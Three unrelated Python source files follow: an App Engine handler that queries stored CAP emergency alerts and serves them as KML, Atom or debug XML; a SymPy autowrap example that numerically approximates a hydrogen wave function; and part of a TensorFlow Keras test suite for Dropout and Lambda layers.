# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Query interface to the Datastore populated by cap_mirror."""
__author__ = 'Matthew.H.Frantz@gmail.com (Matt Frantz)'
import logging
import traceback
from xml.parsers import expat
# Third party imports.
import pyfo
import cap as caplib
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.runtime import DeadlineExceededError
import cap2kml
import cap_parse_mem
import cap_schema
import cap_schema_mem
import web_query
import webapp_util
import xml_util
CAP_V1_1_XMLNS_URN = 'urn:oasis:names:tc:emergency:cap:1.1'
def _MakeCapSchema():
# TODO(Matt Frantz): Permit different set of operators for timestamps, geo.
scalar_ops = web_query.Operators.SCALAR_ALL
datetime_ops = web_query.Operators.DATETIME_ALL
key_ops = web_query.Operators.KEY_ALL
list_ops = web_query.Operators.LIST_ALL
default_model = 'CapAlert'
return web_query.Schema({
'Feed': {
'url': scalar_ops},
default_model: {
'crawl': key_ops,
'feed': key_ops,
'url': scalar_ops,
'identifier': scalar_ops,
'sender': scalar_ops,
'sent': datetime_ops,
'status': scalar_ops,
'msgType': scalar_ops,
'source': scalar_ops,
'scope': scalar_ops,
'restriction': scalar_ops,
'code': list_ops,
'references': list_ops,
# Info
'language': list_ops,
'category': list_ops,
'responseType': list_ops,
'urgency': list_ops,
'severity': list_ops,
'certainty': list_ops,
'audience': list_ops,
'effective': datetime_ops,
'onset': datetime_ops,
'expires': datetime_ops,
'senderName': list_ops,
'web': list_ops,
'contact': list_ops,
# Resource
'resourceDesc': list_ops,
'mimeType': list_ops,
'size': list_ops,
'uri': list_ops,
# Area
'altitude': list_ops,
'ceiling': list_ops,
},
}, default_model)
CAP_SCHEMA = _MakeCapSchema()
class CapQueryResult(object):
"""Contains a single element of a CapQuery result.
Attributes:
model: cap_schema_mem.ShadowAlert object
text: Original XML text (str or unicode)
url: URL from which the text was fetched (str or unicode)
"""
def __init__(self, model, text, url):
self.model = model
self.text = text
self.url = url
class CapQuery(webapp.RequestHandler):
"""Handler for requests that require queries of Datastore.
This class includes the query execution planning logic.
Queries involve either a direct query on the main CAP model (CapAlert), or
an indirect query via references from Feed. The _WriteResponse virtual
method will be provided with an iterable of instances of CAP Alert model
types.
"""
def get(self):
"""Parses query predicates and responds with error screens or CAP data."""
user_query, unknown_arguments = CAP_SCHEMA.QueryFromRequest(self.request)
unknown_arguments = self._HandleUnknownArguments(
frozenset(unknown_arguments))
if unknown_arguments:
webapp_util.WriteTemplate(self.response, 'unknown_arguments.html',
{'unknown_arguments': unknown_arguments,
'models': CAP_SCHEMA.Help()})
return
# Choose the query executor.
# TODO(Matt Frantz): Better query execution planning.
if 'Feed' in user_query.models:
execute = self._QueryByFeed
elif 'CapAlert' in user_query.models:
execute = self._QueryByCapAlert
else:
webapp_util.WriteTemplate(self.response, 'no_arguments.html',
dict(models=CAP_SCHEMA.Help()))
return
# Use the most recent completed crawl for each feed to serve queries.
restricted_query = self._ApplyLastCrawlsToQuery(user_query)
# Execute the query.
alerts = execute(user_query, restricted_query)
# If an error response is written, no CAP data will be returned.
if alerts is not None:
self._WriteResponse(alerts, user_query)
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
raise NotImplementedError()
def _WriteResponse(self, alerts, user_query):
"""Abstract method that writes the response of a slow path query.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
raise NotImplementedError()
def _ApplyLastCrawlsToQuery(self, user_query):
"""Restrict the user query to the latest crawl.
Args:
user_query: web_query.Query object
Returns:
web_query.Query object with crawl predicates
"""
crawls = cap_schema.LastCrawls()
if not crawls:
return user_query
# Extend the list of predicates with Crawl predicates.
predicates = list(user_query.predicates)
predicates.append(
web_query.SimpleComparisonPredicate('CapAlert', 'crawl', list(crawls),
web_query.Operators.KEY_IN))
return web_query.Query(predicates)
def _QueryByFeed(self, user_query, restricted_query):
"""Queries by following the Feed -> Cap hierarchy.
Args:
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
# Lookup the feeds.
gql_list, gql_params = restricted_query.ApplyToGql('Feed')
feed_query = db.GqlQuery(
'SELECT __key__ FROM Feed WHERE %s' % ' AND '.join(gql_list),
**gql_params)
feed_keys = list(feed_query)
if not feed_keys:
# Show all valid feed URL's in the error page.
all_feed_query = cap_schema.Feed.all()
webapp_util.WriteTemplate(
self.response, 'unknown_feed_url.html',
{'unknown_feed_url': repr(self.request.get('Feed.url')),
'feed_urls': [repr(x.url) for x in all_feed_query]})
return None
# Extend the list of predicates with Feed.key predicates.
predicates = list(restricted_query.predicates) + [
web_query.SimpleComparisonPredicate('CapAlert', 'feed', feed_keys,
web_query.Operators.KEY_IN)]
cap_query = web_query.Query(predicates)
return self._DoCapAlertQuery(user_query, cap_query)
def _QueryByCapAlert(self, user_query, restricted_query):
"""Queries the CapAlert models directly.
Args:
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
assert 'Feed' not in user_query.models
return self._DoCapAlertQuery(user_query, restricted_query)
def _DoCapAlertQuery(self, user_query, restricted_query):
"""Executes a CapAlert query and returns the CAP representations.
Args:
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
return self._DoQuery('CapAlert', cap_schema.CapAlert,
user_query, restricted_query)
def _DoQuery(self, model_name, model_class, user_query, restricted_query):
"""Runs the Datastore query.
Args:
model_name: Model name (str)
model_class: db.Model subclass
user_query: What the user specified (web_query.Query)
restricted_query: Last crawled version of user_query (web_query.Query)
Returns:
Iterable of CapQueryResult objects.
"""
gql_list, gql_params = restricted_query.ApplyToGql(model_name)
db_query = model_class.gql('WHERE %s' % ' AND '.join(gql_list),
**gql_params)
model_count = 0
# Avoid duplicate alerts.
alert_texts = set()
# We may need the cap_parse parser.
parser = cap_parse_mem.MemoryCapParser(query=user_query)
# Count how many alerts were handled in different execution paths.
caplib_alerts = 0
parseable_alerts = 0
clean_alerts = 0
unparseable_alerts = 0
unicode_alerts = 0
bad_xml_alerts = 0
# Transform ShadowCap list into a list of CapQueryResult objects.
alerts = []
for model in db_query:
model_count += 1
# Suppress duplicates.
alert_text = model.text
if alert_text in alert_texts:
continue
else:
alert_texts.add(alert_text)
# We will eventually have to get a Cap, ShadowCap, or proxy object.
# We'll get it in the most efficient way possible.
# Try it with the standard-conforming parser.
alert_model = CapQuery._ParseConformingCap(alert_text, query=user_query)
if alert_model:
caplib_alerts += 1
else:
# If we were unable to use the caplib parser, try our own.
alert_model, errors = CapQuery._ParseNonconformingCap(parser, alert_text)
if alert_model:
if errors:
parseable_alerts += 1
else:
clean_alerts += 1
else:
unparseable_alerts += 1
# Filter any predicates that might not have been applied in the GQL query.
if alert_model and user_query.PermitsModel('Cap', alert_model):
# Save the model and the original XML.
alerts.append(
CapQueryResult(alert_model, alert_text, model.url))
unique_model_count = len(alerts)
logging.info(
('Visited %(model_count)d models, %(unique_model_count)d unique = ' +
'%(caplib_alerts)d caplib + %(clean_alerts)d clean + ' +
'%(parseable_alerts)d parseable + %(unparseable_alerts)d unparseable'),
locals())
return alerts
@classmethod
def _ParseConformingCap(cls, alert_text, query=None):
"""Parses CAP alert with the standard-conforming caplib parser.
Args:
alert_text: XML representation of the alert (unicode)
query: web_query.Query object for deferred filtering.
Returns:
cap_schema_mem.ShadowCap object or None if there was a problem parsing.
"""
cap_namespaces = [CAP_V1_1_XMLNS_URN]
try:
# Convert to string, since expat parser does not seem to support
# Unicode.
# TODO(Matt Frantz): Figure out why we have to do this. Expat claims
# to support Unicode. Maybe we can use a different parser for
# caplib.
alert_text_str = str(alert_text)
for cap_namespace in cap_namespaces:
try:
# Parse the XML into a caplib.Alert object.
alert_model = caplib.ParseString(alert_text_str,
namespace=cap_namespace)
# Create a shadow alert object that can apply the deferred query.
shadow_alert = cap_schema_mem.ShadowAlert(query=query)
# Copy the data from the original alert to the shadow using an
# internal method (defined in caplib's Container class). The
# Container constructor is overly restrictive about the type of the
# template argument, so this hack is necessary.
# TODO(Matt Frantz): Avoid this hack.
shadow_alert._init_from_obj_(alert_model)
break
except (caplib.ConformanceError, ValueError, TypeError), e:
logging.debug('caplib error %s (%s) parsing %r',
type(e), e, alert_text_str)
except UnicodeEncodeError, e:
# We can't convert to string, so we can't really parse this with the
# caplib parser.
logging.debug('UnicodeEncodeError (%s) parsing %r', e, alert_text)
except expat.ExpatError, e:
# XML parsing errors are namespace-independent (right?), so log it
# and stop trying.
logging.debug('ExpatError (%s) parsing %r', e, alert_text)
return None
@classmethod
def _ParseNonconformingCap(cls, parser, alert_text, query=None):
"""Parses CAP alert with our own permissive parser.
Args:
parser: cap_parse_mem.MemoryCapParser object
alert_text: XML representation of the alert (unicode)
query: web_query.Query object for deferred filtering.
Returns:
(alert_model, errors)
alert_model: cap_schema_mem.ShadowCap object, or None if there was an
unrecoverable error.
errors: List of recoverable errors, if any.
"""
try:
new_alert_model = lambda: cap_schema_mem.ShadowAlert(query=query)
return parser.MakeAlert(new_alert_model, alert_text)
except cap_parse_mem.Error, e:
logging.debug('%s', traceback.format_exc())
logging.debug('cap_parse_mem error %s (%s) parsing %r',
type(e), e, alert_text)
return None, []
@classmethod
def _NormalizeAlertText(cls, alert_text):
"""Normalizes the XML text representation of a CAP alert node.
Strips any tag namespace prefixes.
Args:
alert_text: XML representation (str or unicode)
Returns:
Normalized XML representation (unicode)
"""
alert_nodes = cap_parse_mem.ParseCapAlertNodes(alert_text)
if len(alert_nodes) > 1:
logging.error(
'How did that get in there? I thought cap_mirror rejected CAPs' +
' with more than one alert node!\n%r', alert_text)
alert_node = alert_nodes[0]
cls._NormalizeAlert(alert_node, CAP_V1_1_XMLNS_URN)
return xml_util.NodeToString(alert_node)
@classmethod
def _NormalizeAlert(cls, node, namespace_urn):
"""Normalizes the XML representation of a CAP alert node.
Strips any tag namespace prefixes.
Args:
node: xml.dom.Node representing the CAP alert (modified in place)
namespace_urn: XML namespace URN (str)
"""
# Apply the namespace prefix throughout.
cls._NormalizeNode(node)
# Strip out any xmlns attributes.
attributes = node.attributes
for i in xrange(attributes.length):
attribute = attributes.item(i)
name = attribute.name
if name == 'xmlns' or name.startswith('xmlns:'):
node.removeAttribute(name)
# Apply the XML namespace attribute to the alert node.
node.setAttribute('xmlns', namespace_urn)
@classmethod
def _NormalizeNode(cls, node):
"""Normalizes the XML representation of an XML node.
Strips any tag namespace prefix.
Args:
node: xml.dom.Node (modified in place).
"""
try:
tag = node.tagName
except AttributeError:
# Not an XML element.
return
node.tagName = cls._NormalizeTag(tag)
for child in node.childNodes:
cls._NormalizeNode(child)
@classmethod
def _NormalizeTag(cls, tag):
"""Normalizes the XML tag name.
Strips any tag namespace prefix.
Args:
tag: XML node tag (str)
Returns:
tag without any namespace prefix.
"""
colon = tag.find(':')
if colon >= 0:
tag = tag[colon + 1:]
return tag
class Cap2Kml(CapQuery):
"""Handler for cap2kml requests that produce KML responses.
Attributes:
as_xml: If True, response content type will be XML. If False, it will be
KML. (Written by _HandleUnknownArguments; read by _WriteResponse.)
"""
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
unknown_arguments = set(unknown_arguments)
# Support alternate response content type.
self.as_xml = 'as_xml' in unknown_arguments and self.request.get('as_xml')
unknown_arguments.discard('as_xml')
return frozenset(unknown_arguments)
def _WriteResponse(self, alerts, user_query):
"""Writes a KML response.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
logging.info('Generating KML')
placemarks = []
for alert in alerts:
try:
placemark = cap2kml.CapAlertAsKmlPlacemark(alert.model).ToKml()
placemarks.append(placemark)
except (DeadlineExceededError, AssertionError):
raise
except Exception, e:
logging.exception(e)
if self.as_xml:
content_type = 'text/xml'
else:
content_type = 'application/vnd.google-earth.kml+xml'
logging.info('Writing response as %s', content_type)
self.response.headers['Content-Type'] = content_type
self.response.out.write(pyfo.pyfo(cap2kml.Kml(placemarks), prolog=True))
class Cap2Atom(CapQuery):
"""Handler for cap2atom requests that produce ATOM responses."""
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
# We don't have any additional arguments.
return unknown_arguments
def _WriteResponse(self, alerts, user_query):
"""Writes an ATOM index of CAP's.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
# Generate a feed title based on the query.
title = 'CapQuery: %s' % user_query
# Normalize the XML.
logging.info('Normalizing XML')
# TODO(Matt Frantz): Some deferred predicates will be ignored because we are
# returning to the source XML rather than allowing the shadow models to
# apply the predicates. When cap_parse is a complete parser, we can use
# the model to generate the filtered, normalized XML.
# TODO(Matt Frantz): We could normalize XML during crawl, although that
# would make it difficult to apply improvements to the parser
# retroactively on historical data.
for alert in alerts:
alert.text = Cap2Atom._NormalizeAlertText(alert.text)
logging.info('Writing response')
webapp_util.WriteTemplate(self.response, 'atom_index.xml',
dict(title=title, alerts=alerts))
self.response.headers['Content-Type'] = 'text/xml'
class Cap2Dump(CapQuery):
"""Handler for cap2dump requests that produce debug XML responses."""
def _HandleUnknownArguments(self, unknown_arguments):
"""Filters arguments that are not web_query parameters.
Args:
unknown_arguments: Set (possibly empty) of CGI argument names (frozenset
of str or unicode).
Returns:
Set of truly unknown arguments for generating an error screen (frozenset
of str or unicode).
"""
# We don't have any additional arguments.
return unknown_arguments
def _WriteResponse(self, alerts, user_query):
"""Writes escaped XML rendering of CAP's.
Args:
alerts: Iterable of CapQueryResult objects.
user_query: What the user specified (web_query.Query)
Postconditions:
self.response is populated.
"""
# Generate a feed title based on the query.
title = 'CapQuery: %s' % user_query
logging.info('Writing response')
self.response.headers['Content-Type'] = 'text/xml'
webapp_util.WriteTemplate(self.response, 'cap_dump.xml',
dict(title=title, alerts=alerts))
application = webapp.WSGIApplication(
[('/cap2kml', Cap2Kml),
('/cap2atom', Cap2Atom),
('/cap2dump', Cap2Dump),
],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in SymPy
to create fast, numerical integration routines callable from python. See
in the code for detailed explanations of the various steps. An
autowrapped sympy expression can be significantly faster than what you
would get by applying a sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For
the sake of demonstration, this will be done by setting up a simple
numerical integration scheme as a SymPy expression, and obtain a binary
implementation with autowrap.
You need to have numpy installed to run this example, as well as a
working fortran compiler. If you have pylab installed, you will be
rewarded with a nice plot in the end.
[0]:
http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
from sympy.external import import_module
np = import_module('numpy')
if not np:
sys.exit("Cannot import numpy. Exiting.")
pylab = import_module('pylab', warn_not_installed=True)
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
basis_dimension = 5 # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1 # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1 # the quantum number `l` for angular momentum
hydrogen_n = 2 # the nodal quantum number for the Hydrogen wave
rmax = 20 # cut off in the radial direction
gridsize = 200 # number of points in the grid
# ***************************************************************************
def main():
print(__doc__)
# arrays are represented with IndexedBase, indices with Idx
m = Symbol('m', integer=True)
i = Idx('i', m)
A = IndexedBase('A')
B = IndexedBase('B')
x = Symbol('x')
print("Compiling ufuncs for radial harmonic oscillator solutions")
# setup a basis of ho-solutions (for l=0)
basis_ho = {}
for n in range(basis_dimension):
# Setup the radial ho solution for this n
expr = R_nl(n, orbital_momentum_l, omega2, x)
# Reduce the number of operations in the expression by eval to float
expr = expr.evalf(15)
print("The h.o. wave function with l = %i and n = %i is" % (
orbital_momentum_l, n))
pprint(expr)
# implement, compile and wrap it as a ufunc
basis_ho[n] = ufuncify(x, expr)
# now let's see if we can express a hydrogen radial wave in terms of
# the ho basis. Here's the solution we will approximate:
H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))
# The transformation to a different basis can be written like this,
#
# psi(r) = sum_i c(i) phi_i(r)
#
# where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
# and c(i) are scalar coefficients.
#
# So in order to express a hydrogen solution in terms of the H.O. basis, we
# need to determine the coefficients c(i). In position space, it means
# that we need to evaluate an integral:
#
# psi(r) = sum_i Integral(R**2*conj(phi(R))*psi(R), (R, 0, oo)) phi_i(r)
#
# To calculate the integral with autowrap, we notice that it contains an
# element-wise sum over all vectors. Using the Indexed class, it is
# possible to generate autowrapped functions that perform summations in
# the low-level code. (In fact, summations are very easy to create, and as
# we will see it is often necessary to take extra steps in order to avoid
# them.)
# we need one integration ufunc for each wave function in the h.o. basis
binary_integrator = {}
for n in range(basis_dimension):
#
# setup basis wave functions
#
# To get inline expressions in the low level code, we attach the
# wave function expressions to a regular SymPy function using the
# implemented_function utility. This is an extra step needed to avoid
# erroneous summations in the wave function expressions.
#
# Such function objects carry around the expression they represent,
# but the expression is not exposed unless explicit measures are taken.
# The benefit is that the routines that searches for repeated indices
# in order to make contractions will not search through the wave
# function expression.
psi_ho = implemented_function('psi_ho',
Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))
# We represent the hydrogen function by an array which will be an input
# argument to the binary routine. This will let the integrators find
# h.o. basis coefficients for any wave function we throw at them.
psi = IndexedBase('psi')
#
# setup expression for the integration
#
step = Symbol('step') # use symbolic stepsize for flexibility
# let i represent an index of the grid array, and let A represent the
# grid array. Then we can approximate the integral by a sum over the
# following expression (simplified rectangular rule, ignoring end point
# corrections):
expr = A[i]**2*psi_ho(A[i])*psi[i]*step
if n == 0:
print("Setting up binary integrators for the integral:")
pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))
# Autowrap it. For functions that take more than one argument, it is
# a good idea to use the 'args' keyword so that you know the signature
# of the wrapped function. (The dimension m will be an optional
# argument, but it must be present in the args list.)
binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])
# Lets see how it converges with the grid dimension
print("Checking convergence of integrator for n = %i" % n)
for g in range(3, 8):
grid, step = np.linspace(0, rmax, 2**g, retstep=True)
print("grid dimension %5i, integral = %e" % (2**g,
binary_integrator[n](grid, H_ufunc(grid), step)))
print("A binary integrator has been set up for each basis state")
print("We will now use them to reconstruct a hydrogen solution.")
# Note: We didn't need to specify grid or use gridsize before now
grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)
print("Calculating coefficients with gridsize = %i and stepsize %f" % (
len(grid), stepsize))
coeffs = {}
for n in range(basis_dimension):
coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
print("c(%i) = %e" % (n, coeffs[n]))
print("Constructing the approximate hydrogen wave")
hydro_approx = 0
all_steps = {}
for n in range(basis_dimension):
hydro_approx += basis_ho[n](grid)*coeffs[n]
all_steps[n] = hydro_approx.copy()
if pylab:
line = pylab.plot(grid, all_steps[n], ':', label='max n = %i' % n)
# check error numerically
diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
print("Error estimate: the element with largest deviation misses by %f" % diff)
if diff > 0.01:
print("This is much, try to increase the basis size or adjust omega")
else:
print("Ah, that's a pretty good approximation!")
# Check visually
if pylab:
print("Here's a plot showing the contribution for each n")
line[0].set_linestyle('-')
pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
pylab.legend()
pylab.show()
print("""Note:
These binary integrators were specialized to find coefficients for a
harmonic oscillator basis, but they can process any wave function as long
as it is available as a vector and defined on a grid with equidistant
points. That is, on any grid you get from numpy.linspace.
To make the integrators even more flexible, you can setup the harmonic
oscillator solutions with symbolic parameters omega and l. Then the
autowrapped binary routine will take these scalar variables as arguments,
so that the integrators can find coefficients for *any* isotropic harmonic
oscillator basis.
""")
if __name__ == '__main__':
main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras core layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.mixed_precision import policy
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes
class DropoutLayersTest(keras_parameterized.TestCase):
def test_dropout(self):
testing_utils.layer_test(
keras.layers.Dropout, kwargs={'rate': 0.5}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dropout,
kwargs={'rate': 0.5,
'noise_shape': [3, 1]},
input_shape=(3, 2))
def test_dropout_supports_masking(self):
dropout = keras.layers.Dropout(0.5)
self.assertEqual(True, dropout.supports_masking)
def test_spatial_dropout_1d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout1D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4))
def test_spatial_dropout_2d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 5))
def test_spatial_dropout_3d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 4, 5))
def test_dropout_partial_noise_shape(self):
inputs = keras.Input(shape=(5, 10))
layer = keras.layers.Dropout(0.5, noise_shape=(None, 1, None))
outputs = layer(inputs)
model = keras.Model(inputs, outputs)
out = model(np.ones((20, 5, 10)), training=True)
out_np = keras.backend.get_value(out)
# Test that dropout mask is shared across second dim.
self.assertAllClose(out_np[:, 0, :], out_np[:, 1, :])
@keras_parameterized.run_all_keras_modes
class LambdaLayerTest(keras_parameterized.TestCase):
def test_lambda(self):
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={'function': lambda x: x + 1},
input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={
'function': lambda x, a, b: x * a + b,
'arguments': {
'a': 0.6,
'b': 0.4
}
},
input_shape=(3, 2))
# test serialization with function
def f(x):
return x + 1
ld = keras.layers.Lambda(f)
config = ld.get_config()
ld = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertEqual(ld.function(3), 4)
# test with lambda
ld = keras.layers.Lambda(
lambda x: keras.backend.concatenate([math_ops.square(x), x]))
config = ld.get_config()
ld = keras.layers.Lambda.from_config(config)
self.assertAllEqual(self.evaluate(ld.function([3])), [9, 3])
def test_lambda_multiple_inputs(self):
ld = keras.layers.Lambda(lambda x: x[0], output_shape=lambda x: x[0])
x1 = np.ones([3, 2], np.float32)
x2 = np.ones([3, 5], np.float32)
out = ld([x1, x2])
self.assertAllEqual(out.shape, [3, 2])
def test_lambda_output_shape(self):
l = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual((1, 1), l.get_config()['output_shape'])
def test_lambda_output_shape_function(self):
def get_output_shape(input_shape):
return 1 * input_shape
l = keras.layers.Lambda(lambda x: x + 1, output_shape=get_output_shape)
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual('lambda', l.get_config()['output_shape_type'])
def test_lambda_output_shape_autocalculate_multiple_inputs(self):
def lambda_fn(x):
return math_ops.matmul(x[0], x[1])
l = keras.layers.Lambda(lambda_fn, dtype=dtypes.float64)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual((10, 20), output_shape)
output_signature = l.compute_output_signature([
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 10)),
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 20))])
self.assertAllEqual((10, 20), output_signature.shape)
self.assertAllEqual(dtypes.float64, output_signature.dtype)
def test_lambda_output_shape_list_multiple_outputs(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=[(10,), (20,)])
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_tuple_with_none(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=(None, 10))
output_shape = l.compute_output_shape((5, 10, 20))
self.assertAllEqual([5, None, 10], output_shape.as_list())
def test_lambda_output_shape_function_multiple_outputs(self):
def lambda_fn(x):
return x
def output_shape_fn(input_shape):
return input_shape
l = keras.layers.Lambda(lambda_fn, output_shape=output_shape_fn)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_nested(self):
def lambda_fn(inputs):
return (inputs[1]['a'], {'b': inputs[0]})
l = keras.layers.Lambda(lambda_fn)
output_shape = l.compute_output_shape(((10, 20), {'a': (10, 5)}))
self.assertAllEqual(((10, 5), {'b': (10, 20)}), output_shape)
def test_lambda_config_serialization(self):
# Test serialization with output_shape and output_shape_type
layer = keras.layers.Lambda(
lambda x: x + 1,
output_shape=(1, 1),
mask=lambda i, m: m)
layer(keras.backend.variable(np.ones((1, 1))))
config = layer.get_config()
layer = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
layer = keras.layers.Lambda.from_config(config)
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
def test_lambda_with_training_arg(self):
def fn(x, training=True):
return keras.backend.in_train_phase(x, 2 * x, training=training)
layer = keras.layers.Lambda(fn)
x = keras.backend.ones(())
train_out = layer(x, training=True)
eval_out = layer(x, training=False)
self.assertEqual(keras.backend.get_value(train_out), 1.)
self.assertEqual(keras.backend.get_value(eval_out), 2.)
def test_lambda_with_mask(self):
def add_one(inputs):
return inputs + 1.0
def mask(unused_inputs, previous_mask):
return previous_mask
layer = keras.layers.Lambda(add_one, mask=mask)
x = np.ones([5, 4, 3])
x[:, -1, :] = 0
masking = keras.layers.Masking()
out = layer(masking(x))
expected_out = np.full([5, 4, 3], 2.0)
expected_out[:, -1, :] = 1.0
expected_mask = np.ones([5, 4])
expected_mask[:, -1] = 0.0
self.assertAllClose(self.evaluate(out), expected_out)
self.assertIsNotNone(out._keras_mask)
self.assertAllClose(self.evaluate(out._keras_mask), expected_mask)
def test_lambda_with_ragged_input(self):
def add_one(inputs):
return inputs + 1.0
layer = keras.layers.Lambda(add_one)
ragged_input = ragged_factory_ops.constant([[1.0], [2.0, 3.0]])
out = layer(ragged_input)
expected_out = ragged_factory_ops.constant([[2.0], [3.0, 4.0]])
self.assertAllClose(out, expected_out)
def test_lambda_deserialization_does_not_pollute_core(self):
layer = keras.layers.Lambda(lambda x: x + 1)
config = layer.get_config()
keras.layers.Lambda.from_config(config)
self.assertNotIn(self.__class__.__name__, dir(core))
class TestStatefulLambda(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_lambda_with_variable_in_model(self):
v = variables.Variable(1., trainable=True)
def lambda_fn(x, v):
return x * v
# While it is generally not advised to mix Variables with Lambda layers, if
# the variables are explicitly set as attributes then they are still
# tracked. This is consistent with the base Layer behavior.
layer = keras.layers.Lambda(lambda_fn, arguments={'v': v})
self.assertLen(layer.trainable_weights, 0)
layer.v = v
self.assertLen(layer.trainable_weights, 1)
model = testing_utils.get_model_from_layers([layer], input_shape=(10,))
model.compile(
keras.optimizer_v2.gradient_descent.SGD(0.1),
'mae',
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10), 'float32'), 2 * np.ones((10, 10), 'float32')
